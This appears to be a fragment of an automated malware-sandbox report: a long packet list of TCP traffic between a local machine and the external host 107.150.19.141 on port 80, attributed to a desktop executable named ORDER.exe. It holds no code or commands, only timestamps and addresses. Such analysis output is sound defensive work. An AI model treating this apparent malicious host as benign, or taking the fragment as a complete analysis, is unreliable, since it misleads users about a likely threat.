                        Sep 12, 2024 10:16:33.045944929 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.046003103 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.046005011 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.046063900 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.046118021 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.046173096 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.046175957 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.046176910 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.046176910 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.046227932 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.046386003 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.046559095 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.046560049 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.046560049 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.268825054 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.268898964 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.268954039 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269000053 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.269011021 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269067049 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269119978 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269144058 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.269176006 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269182920 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.269232035 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269285917 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269340038 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269349098 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.269349098 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.269393921 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269450903 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269505978 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269517899 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.269560099 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269614935 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269668102 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269721031 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269736052 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.269736052 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.269776106 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269830942 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269884109 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269903898 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.269937992 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.269993067 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.270045996 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.270085096 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.270085096 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.270100117 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.270154953 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.270200014 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.270200014 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.270209074 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.270262957 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.270317078 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.270370007 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.270370007 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.270370960 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.270370960 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.270426035 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.270479918 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.270533085 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.270585060 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.270755053 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.270755053 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.270755053 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.493576050 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.493685007 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.493803024 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.493932962 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.494067907 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.494102001 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.494158983 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.494400024 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.494448900 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.494524002 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.494575024 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.494652987 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.494784117 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.494868040 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.494889021 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.494889021 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.494889021 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.494889021 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.494992971 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.495022058 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.495290041 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.495352030 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.495479107 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.495532036 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.495557070 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.495749950 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.495791912 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.495791912 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.495862961 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.495961905 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.496009111 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.496011019 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.496011019 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.496148109 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.496237993 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.496243000 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.496287107 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.496328115 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.496519089 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.496597052 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.496638060 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.496757984 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.496769905 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.496824980 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.496926069 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.496939898 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.496952057 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.496952057 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.497019053 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.497059107 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.497267008 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.497267008 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.497508049 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.497549057 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.497580051 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.497600079 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.497621059 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.497663021 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.497730970 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.497849941 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.497850895 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.497975111 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.498019934 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.498153925 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.498179913 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.498359919 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.498361111 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.498361111 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.498527050 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.498542070 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.498651028 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.498663902 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.498701096 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.498701096 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.498733044 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.498795986 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.498862982 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.498920918 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.498985052 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.499111891 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.499155045 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.499255896 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.499320030 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.499366045 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.499409914 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.499418974 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.499578953 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.499610901 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.499732971 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.499748945 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.499748945 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.499866009 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.499917984 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.499922037 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.500087976 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.500117064 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.500169039 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.500235081 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.500283003 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.500339985 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.500482082 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.500500917 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.500536919 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.500539064 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.500570059 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.500705004 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.500705004 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.500705004 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.717811108 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.717890978 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.717948914 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718004942 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718075037 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718131065 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718185902 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718192101 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.718192101 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.718192101 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.718241930 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718297958 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718353033 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718372107 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.718372107 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.718406916 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718537092 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.718537092 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.718566895 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718622923 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718677998 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718708038 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.718708038 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.718868017 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.718868971 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.718895912 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.718954086 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719007969 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719052076 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.719063044 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719153881 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719208002 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.719216108 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719271898 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719325066 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719383001 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.719383001 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.719506979 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719548941 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.719549894 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.719563961 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719619036 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719674110 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719718933 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.719727993 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719783068 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719883919 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.719891071 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.719891071 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.719939947 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720041037 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720050097 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.720098019 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720155001 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720204115 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.720205069 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.720278978 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720360041 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720377922 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.720379114 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.720417976 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720530987 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720542908 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.720542908 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.720587969 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720690966 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720710993 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.720747948 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720802069 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720855951 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720882893 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.720911026 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.720966101 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721019030 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721060038 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.721060038 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.721075058 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721129894 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721184015 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721230030 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.721230030 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.721237898 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721292019 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721345901 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721394062 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.721394062 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.721447945 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721564054 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.721564054 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.721585989 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721643925 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721698999 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721714020 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.721714020 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.721752882 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721807957 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721862078 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.721884012 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.721884012 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.721963882 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722054005 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.722054005 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.722104073 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722162962 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722217083 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.722217083 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.722218990 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722234964 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722292900 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722387075 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.722399950 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722415924 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722503901 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722518921 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722557068 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.722557068 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.722557068 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.722605944 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722654104 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722728014 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.722796917 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722816944 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722863913 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722897053 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.722897053 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.722965002 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.722984076 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.723067045 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.723155022 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.723174095 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.723190069 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.723237038 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.723237038 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.723297119 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.723316908 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.723366022 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.723407030 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.723407030 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.723495960 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.723577023 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.723577023 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.723577023 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.723666906 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.723685980 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.723701954 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.723747015 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.723752975 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.723916054 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.723916054 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.724029064 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724045038 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724060059 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724075079 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724112988 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724170923 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724194050 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724209070 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724225044 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724240065 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724256992 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.724256992 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.724370956 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724423885 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724426985 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.724426985 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.724536896 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724550962 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.724597931 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.724766016 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.724936008 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:17:40.463397026 CEST4973680192.168.11.20107.150.19.141
                        • 107.150.19.141
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.11.2049736107.150.19.141803104C:\Users\user\Desktop\ORDER.exe
                        TimestampBytes transferredDirectionData
